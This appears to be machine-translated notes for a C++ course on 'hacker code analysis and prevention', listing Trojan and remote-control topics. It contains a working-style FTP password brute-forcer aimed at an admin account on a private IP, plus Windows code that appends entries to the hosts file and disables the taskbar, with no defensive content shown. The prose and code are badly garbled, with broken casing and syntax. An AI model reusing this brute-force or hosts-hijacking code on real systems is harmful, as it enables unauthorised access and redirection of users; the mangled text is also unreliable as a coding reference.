Preach Intelligence Podcast C + + Public Lesson notes--Hacker Code Analysis and prevention

Hacker code Analysis and Prevention notes

"Course profile"

C + + language is in addition to the compilation, the closest to the bottom of the computer language, the current windows,linux,ios,android and other mainstream operating systems are written in C + +, so many viruses, Trojans are also implemented in C/S. The purpose of the course is to pass the C language secret Trojan and various remote control software implementation principle and how to protect.

"Course knowledge points"

1, Trojan intrusion system mode;

2, the Trojan invasion to the host target after the key behavior analysis;

3, trusted port and port scanning technology;

4, remote control implementation of code implementation;

5, using TCP, UDP protocol and firewall traversal technology in malicious code;

6, 360 Network security protection implementation principle.

#include <stdio.h> #include <string.h> #define CONTENT "open%s\nuser\n%s\n%s\nbye\n" int write_file (const Char *ip, const char *user, const char *passwd) {FILE *p = fopen ("A.txt", "w"), if (p) {char buf[1024] = {0};sprintf (buf, C Ontent, IP, user, passwd); Fputs (buf, p); fclose (P); return 0;//If successful, returns 0}return-1;//failure, -1}int main () {int i;for (i = 0; I < ; 1000000; i++)//Assume that the password is all composed of numbers {char pass[100] = {0};sprintf (pass, "%06d", I);//formatted as a string if (Write_file ("192.168.101.138", "admin",  pass) = = 0) {FILE *p = _popen ("Ftp-n-s:a.txt", "R"), while (!feof (p)) {char buf[1024] = {0};fgets (buf, sizeof (BUF), p); if (STRNCMP (buf, "230", 3) = = 0)//based on the return value 230 stands for success, {printf ("pass:%s\n", pass); return 0;}} _pclose (P);}} return 0;}

function function:

Lockmask.cpp: Defines the entry point for the application. #include "stdafx.h" #include "lockmask.h"//function function/* Modify application Icon vs: Replace the project name. ico file qt:a. Find a picture. ico, name changed to Myapp.icob. Create a text document MYAPP.RC. Internal add idi_icon1 ICON discardable "Myapp.ico" C. After the Myapp.pro file is added rc_file=myapp.rc, rebuilt, the modification succeeds; The *//*vs2013 argument does not need to rely on the library, XP-compatible Project project--Properties--Configuration Properties--general--Platform Toolset--windwos XP Project--Properties--Configuration Properties--c/c++--code generation--Runtime--multithreading (/MT). */#include "stdafx.h" # Include <stdio.h> #include <string.h> #include <Windows.h> #include <ShellAPI.h> #pragma Warning (disable:4996) void getwinversion ()//Get Win version {osVersionInfo a;a.dwosversioninfosize = sizeof (a); GetVersionEx (&a);} int sethosts (const char *IP, const char *domain)//Modify Hosts file {char s[100] = {0}; Getsystemdirectorya (S, sizeof (s));//Get Windows System directory char path[100] = {0};sprintf (path, "%s\\%s", S, "\\drivers\\etc\\ "The hosts"); char content[1024] = {0};sprintf (content, "%s%s", IP, domain); File *p = fopen (Path, "a");//Open Hosts file if (p) {fputs (content, p); fclose (p); return 0;} return-1;} HWND gettask ()//Get the taskbar handle {typedefHWND (WINAPI *procgettaskmanwnd) (void);//What an HWND func (); a function pointer of type Procgettaskmanwnd gettaskmanwindow;// Define function pointer variable hmodule HUSER32 = Getmodulehandlea ("user32");//reference User32.dll Library if (!HUSER32) return NULL; Gettaskmanwindow = (Procgettaskmanwnd) GetProcAddress (HUser32, "Gettaskmanwindow"); Gettaskmanwindow) return NULL; HWND h = Gettaskmanwindow (); return GetParent (GetParent (h));}                     int Apientry _tWinMain (_in_ hinstance hinstance, _in_opt_ hinstance hprevinstance, _in_ LPTSTR lpcmdline, _in_ int ncmdshow) {HWND h = gettask ();//enablewindow (H, false);//taskbar Set to unavailable EnableWindow (H, true);//Set the taskbar to available return 0;}

Preach Intelligence Podcast C + + Public Lesson notes--Hacker Code Analysis and prevention